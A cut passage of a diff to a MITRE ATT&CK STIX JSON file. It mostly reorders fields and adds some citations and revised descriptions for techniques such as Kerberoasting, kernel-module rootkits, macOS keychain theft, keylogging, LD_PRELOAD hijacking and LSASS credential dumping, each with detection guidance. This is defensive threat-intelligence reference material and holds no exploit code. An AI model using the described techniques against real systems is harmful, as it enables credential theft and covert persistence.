+ ]
},
{
"external_references": [
@@ -13453,20 +14020,20 @@
],
"modified": "2020-03-15T00:30:25.444Z",
"created": "2020-03-15T00:30:25.444Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0",
@@ -13575,22 +14142,22 @@
],
"modified": "2020-02-27T18:25:30.124Z",
"created": "2020-02-11T18:43:38.588Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
- "x_mitre_system_requirements": [
- "Valid domain account or the ability to sniff traffic within a domain"
+ "x_mitre_contributors": [
+ "Praetorian"
],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
],
- "x_mitre_contributors": [
- "Praetorian"
- ]
+ "x_mitre_system_requirements": [
+ "Valid domain account or the ability to sniff traffic within a domain"
+ ],
+ "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -13724,6 +14291,11 @@
"description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.",
"source_name": "Securelist Ventir"
},
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ },
{
"url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html",
"description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.",
@@ -13740,7 +14312,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Kernel Modules and Extensions",
- "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)",
+ "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
"id": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -13753,26 +14325,27 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-25T16:14:29.149Z",
+ "modified": "2020-06-30T21:23:15.188Z",
"created": "2020-01-24T17:42:23.339Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
- ],
- "x_mitre_contributors": [
- "Jeremy Galloway",
- "Red Canary"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "root"
],
+ "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands:modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nFor macOS, monitor for execution of kextload commands and correlate with other unknown or suspicious activity.\n\nAdversaries will likely run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)",
- "x_mitre_permissions_required": [
- "root"
+ "x_mitre_contributors": [
+ "Anastasios Pingios",
+ "Jeremy Galloway",
+ "Red Canary"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"id": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d",
@@ -13800,6 +14373,15 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-02-12T18:55:24.728Z",
+ "modified": "2020-02-17T13:14:31.140Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3",
"description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user\u2019s logon credentials.",
"name": "Keychain",
@@ -13824,33 +14406,31 @@
"source_name": "External to DA, the OS X Way"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
+ "x_mitre_platforms": [
+ "macOS"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
+ "x_mitre_permissions_required": [
+ "Administrator"
],
- "modified": "2020-02-17T13:14:31.140Z",
- "created": "2020-02-12T18:55:24.728Z",
"x_mitre_data_sources": [
"PowerShell logs",
"Process monitoring",
"File monitoring",
"System calls",
"API monitoring"
- ],
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "macOS"
]
},
{
+ "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.",
+ "name": "Keylogging",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -13868,13 +14448,6 @@
"source_name": "Adventures of a Keystroke"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Keylogging",
- "description": "Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.\n\nKeylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.\n* Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* Custom drivers.",
- "id": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -13971,21 +14544,21 @@
],
"modified": "2020-03-24T16:50:36.235Z",
"created": "2020-01-24T14:21:52.750Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Binary file metadata"
],
- "x_mitre_detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "attack-pattern--a0a189c8-d3bd-4991-bf6f-153d185ee373",
@@ -14021,31 +14594,31 @@
],
"modified": "2020-03-30T13:53:57.518Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "Binary file metadata",
- "Malware reverse engineering",
- "Process monitoring"
- ],
- "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.",
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Process whitelisting",
- "Whitelisting by file name or path"
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "macOS"
],
"x_mitre_permissions_required": [
"User",
"Administrator"
],
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Application whitelisting",
+ "Process whitelisting",
+ "Whitelisting by file name or path"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.",
+ "x_mitre_data_sources": [
+ "Binary file metadata",
+ "Malware reverse engineering",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
- "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)\n\nLD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)\n\nAdversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)\n\nLD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.",
"name": "LD_PRELOAD",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -14057,6 +14630,11 @@
"external_id": "T1574.006",
"url": "https://attack.mitre.org/techniques/T1574/006"
},
+ {
+ "source_name": "Man LD.SO",
+ "url": "https://www.man7.org/linux/man-pages/man8/ld.so.8.html",
+ "description": "Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020."
+ },
{
"source_name": "TLDP Shared Libraries",
"url": "https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html",
@@ -14093,19 +14671,19 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-26T18:46:55.796Z",
+ "modified": "2020-06-15T21:59:25.358Z",
"created": "2020-03-13T20:09:59.569Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Monitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Environment variable"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0",
@@ -14240,14 +14818,9 @@
],
"modified": "2020-03-31T13:54:08.239Z",
"created": "2020-02-11T19:08:51.677Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Eric Kuehn, Secure Ideas",
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -14255,9 +14828,14 @@
"Packet capture",
"Netflow/Enclave netflow"
],
- "x_mitre_contributors": [
- "Eric Kuehn, Secure Ideas",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14309,22 +14887,22 @@
],
"modified": "2020-03-24T20:35:42.440Z",
"created": "2020-02-21T16:22:09.493Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
- "x_mitre_permissions_required": [
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
"x_mitre_data_sources": [
"Process monitoring",
"PowerShell logs",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14363,6 +14941,26 @@
"created": "2018-01-16T16:13:52.465Z"
},
{
+ "created": "2020-01-24T18:38:55.801Z",
+ "modified": "2020-03-25T16:52:26.567Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
+ "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
+ "name": "LSASS Driver",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -14390,26 +14988,6 @@
"source_name": "TechNet Autoruns"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "LSASS Driver",
- "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
- "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T16:52:26.567Z",
- "created": "2020-01-24T18:38:55.801Z",
"x_mitre_platforms": [
"Windows"
],
@@ -14472,25 +15050,25 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-24T20:34:26.145Z",
+ "modified": "2020-06-09T20:46:00.393Z",
"created": "2020-02-11T18:41:44.783Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
"x_mitre_data_sources": [
"Process command-line parameters",
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14517,11 +15095,12 @@
],
"modified": "2020-03-23T22:10:10.862Z",
"created": "2020-03-11T21:01:00.959Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
@@ -14531,12 +15110,11 @@
"Network protocol analysis",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -14661,19 +15239,19 @@
],
"modified": "2020-03-25T22:11:45.513Z",
"created": "2020-01-17T16:10:58.592Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "File monitoring"
],
+ "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.",
- "x_mitre_data_sources": [
- "Process monitoring",
- "File monitoring"
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -14759,20 +15337,20 @@
],
"modified": "2020-03-25T22:27:49.609Z",
"created": "2020-01-17T19:23:15.227Z",
- "x_mitre_platforms": [
- "macOS"
- ],
